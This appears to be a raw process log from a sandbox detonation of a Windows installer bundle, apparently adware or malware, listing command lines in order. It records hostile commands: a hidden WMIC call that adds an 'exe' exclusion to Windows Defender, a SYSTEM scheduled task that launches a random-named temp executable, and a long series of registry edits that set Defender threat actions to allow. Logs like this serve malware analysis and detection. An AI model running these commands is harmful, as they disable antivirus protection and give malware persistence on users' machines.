C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2088
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1920
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6800 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2160
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2204
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe"
C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe
C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1948
C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe
C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --silent --allusers=0 --server-tracking-blob=OGM2ZGVlZDFmY2UyNDcxNWVmYWI1ZWU0ZjhjZGUxOTBiYmE0M2ZjNWM0OWFhNzc5MTU3Y2YwZjU2MGI5YWM5Mjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY3ODMuNTEzMCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiNzE1OGQzOTAtNWRkMC00MTI1LTkwMmUtNmNkYjJiZTQ1MWY2In0=
C:\Users\Admin\AppData\Local\Temp\is-CMO7U.tmp\AxnTxNXsNH.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CMO7U.tmp\AxnTxNXsNH.tmp" /SL5="$30382,4415326,54272,C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe"
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x6e3eb1f4,0x6e3eb200,0x6e3eb20c
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4808 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051312" --session-guid=2e9feb41-fadc-440a-88db-4f2d6d5a776b --server-tracking-blob=NGU4ZjBjZTgxNTM1ZTFhZmQ2MDAyY2M0YmVjODhkOGUxZGU3YjdlODc2Mjc0YjdmNzM5YTZmYTE3M2FmYzliNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjc4My41MTMwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI3MTU4ZDM5MC01ZGQwLTQxMjUtOTAyZS02Y2RiMmJlNDUxZjYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C404000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 2768
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6d60b1f4,0x6d60b200,0x6d60b20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2200
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1948
C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe
C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe /sid=3 /pid=1090
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2768 -ip 2768
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1796
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2120
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2120
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2080
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe\" z0 /SRdidV 757674 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1712
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4612 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x1159f88,0x1159f94,0x1159fa0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1872
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe z0 /SRdidV 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
